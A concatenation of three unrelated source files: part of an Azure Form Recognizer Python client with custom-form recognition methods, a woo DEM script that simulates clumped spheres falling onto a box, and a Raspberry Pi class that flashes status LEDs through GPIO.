:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
        :rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_custom_forms.py
:start-after: [START recognize_custom_forms]
:end-before: [END recognize_custom_forms]
:language: python
:dedent: 8
:caption: Recognize fields and values from a custom form.
"""
if not model_id:
raise ValueError("model_id cannot be None or empty.")
pages = kwargs.pop("pages", None)
polling_interval = kwargs.pop(
"polling_interval", self._client._config.polling_interval
)
continuation_token = kwargs.pop("continuation_token", None)
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_custom_forms_from_url() to analyze a document from a URL."
)
if content_type is None and continuation_token is None:
content_type = get_content_type(form)
include_field_elements = kwargs.pop("include_field_elements", False)
def analyze_callback(
raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_form_result(analyze_result, model_id)
callback = kwargs.pop("cls", analyze_callback)
polling = LROBasePolling(
timeout=polling_interval, lro_algorithms=[AnalyzePolling()], **kwargs
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_with_custom_model( # type: ignore
file_stream=form,
model_id=model_id,
include_text_details=include_field_elements,
content_type=content_type,
cls=callback,
polling=polling,
continuation_token=continuation_token,
**kwargs
)
@distributed_trace
def begin_recognize_custom_forms_from_url(self, model_id, form_url, **kwargs):
# type: (str, str, Any) -> LROPoller[List[RecognizedForm]]
"""Analyze a custom form with a model trained with or without labels. The form
to analyze should be of the same type as the forms that were used to train the model.
The input document must be the location (URL) of the document to be analyzed.
:param str model_id: Custom model identifier.
:param str form_url: The URL of the form to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
        :rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
"""
if not model_id:
raise ValueError("model_id cannot be None or empty.")
pages = kwargs.pop("pages", None)
continuation_token = kwargs.pop("continuation_token", None)
include_field_elements = kwargs.pop("include_field_elements", False)
polling_interval = kwargs.pop(
"polling_interval", self._client._config.polling_interval
)
def analyze_callback(
raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_form_result(analyze_result, model_id)
callback = kwargs.pop("cls", analyze_callback)
polling = LROBasePolling(
timeout=polling_interval, lro_algorithms=[AnalyzePolling()], **kwargs
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_with_custom_model( # type: ignore
file_stream={"source": form_url},
model_id=model_id,
include_text_details=include_field_elements,
cls=callback,
polling=polling,
continuation_token=continuation_token,
**kwargs
)
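# --- Illustrative usage sketch (not part of the SDK source) -------------
# Hedged example of the URL-based variant above; `client`, `my_model_id`
# and the URL are placeholders.
#
#   poller = client.begin_recognize_custom_forms_from_url(
#       model_id=my_model_id,
#       form_url="https://example.com/forms/invoice.pdf",
#   )
#   for recognized_form in poller.result():
#       print(recognized_form.form_type, recognized_form.fields)
# -------------------------------------------------------------------------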
def close(self):
# type: () -> None
"""Close the :class:`~azure.ai.formrecognizer.FormRecognizerClient` session."""
return self._client.close()
def __enter__(self):
# type: () -> FormRecognizerClient
self._client.__enter__() # pylint:disable=no-member
return self
def __exit__(self, *args):
# type: (*Any) -> None
self._client.__exit__(*args) # pylint:disable=no-member
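# --- Illustrative usage sketch (not part of the SDK source) -------------
# close/__enter__/__exit__ above make the client usable as a context
# manager; a hedged example with placeholder endpoint/key/model values:
#
#   with FormRecognizerClient(endpoint, AzureKeyCredential(key)) as client:
#       poller = client.begin_recognize_custom_forms_from_url(my_model_id, form_url)
#       forms = poller.result()
# -------------------------------------------------------------------------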
| mit | 2,438,171,152,693,971,500 | 49.569677 | 117 | 0.628183 | false |
gladk/woodem | scripts/test-OLD/clump.py | 3 | 1095 | from woo.core import *
from woo.dem import *
O.scene.engines=[
ForceResetter(),
InsertionSortCollider([
Bo1_Sphere_Aabb(),
Bo1_Box_Aabb(),
]),
InteractionLoop(
[Ig2_Sphere_Sphere_ScGeom(),Ig2_Box_Sphere_ScGeom()],
[Ip2_FrictMat_FrictMat_FrictPhys()],
[Law2_ScGeom_FrictPhys_CundallStrack()]
),
GravityEngine(gravity=[0,0,-9.81]),
NewtonIntegrator(damping=.2,exactAsphericalRot=True)
]
# support
O.dem.par.append(utils.box([0,0,-1.5],[3,3,.2],dynamic=False))
# stand-alone sphere
O.dem.par.append(utils.sphere([0,0,0],.5))
# clumps
relPos=[(0,-.5,-.5),(0,.5,0),(.5,0,0),(0,0,.5)]
coords=[(-2,0,0),(2,0,0),(0,2,0),(0,-2,0)]
for i,cc in enumerate(coords):
# This shorthand command does something like this:
# O.bodies.appendClumped([utils.sphere(...),utils.sphere(...),utils.sphere(...)])
# and returns tuple of clumpId,[bodyId1,bodyId2,bodyId3]
clump,spheres=O.dem.par.appendClumped([utils.sphere([relPos[j][0]+coords[i][0],relPos[j][1]+coords[i][1],relPos[j][2]+coords[i][2]],.5) for j in range(0,i+1)])
print clump,spheres
O.scene.dt=utils.PWaveTimeStep()
O.saveTmp('init')
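# --- Illustrative sketch (not part of the original script) ---------------
# appendClumped returns the clump id and the ids of its member spheres;
# assuming the same utils helpers, an extra clump could be added like this:
#
#   extraSpheres=[utils.sphere([4+dx,0,0],.5) for dx in (0,.5,1)]
#   extraClump,extraMembers=O.dem.par.appendClumped(extraSpheres)
# --------------------------------------------------------------------------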
| gpl-2.0 | -6,718,273,865,120,026,000 | 33.21875 | 159 | 0.679452 | false |
JustinPead/card_authenticator | leds.py | 1 | 1280 | import RPi.GPIO as GPIO
import time
import logging
class LEDs:
def __init__(self, logger=logging.getLogger(__name__)):
self.logger = logger
GPIO.setmode(GPIO.BOARD)
#GPIO.setwarnings(False)
#success LED
GPIO.setup(13,GPIO.OUT)
GPIO.output(13,0)
#Busy LED
GPIO.setup(7,GPIO.OUT)
GPIO.output(7,0)
#fail LED
GPIO.setup(12,GPIO.OUT)
GPIO.output(12,0)
self.logger.debug("LEDS initialised")
def __enter__(self):
return self
def busyOff(self):
GPIO.output(7,0)
def orange(self):
GPIO.output(7,1)
def green(self):
self.busyOff()
for _ in range(6):
GPIO.output(13,1)
time.sleep(0.3)
GPIO.output(13,0)
time.sleep(0.3)
self.logger.debug("Flashed success LED")
def red(self):
self.busyOff()
for _ in range(6):
GPIO.output(12,1)
time.sleep(0.3)
GPIO.output(12,0)
time.sleep(0.3)
self.logger.info("Flashed failed LED")
def __exit__(self, type, value, traceback):
self.logger.debug("lights exited")
GPIO.cleanup() | mit | -5,834,391,912,933,659,000 | 23.64 | 59 | 0.505469 | false |
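# --- Illustrative usage sketch for the LEDs class above (not part of leds.py) ---
# Hedged example; assumes the script runs on a Raspberry Pi with the LEDs
# wired to the pins configured in __init__.
#
#   with LEDs() as leds:
#       leds.orange()   # indicate "busy" while the card is checked
#       # ... authenticate the card ...
#       leds.green()    # or leds.red() on failure
# --------------------------------------------------------------------------------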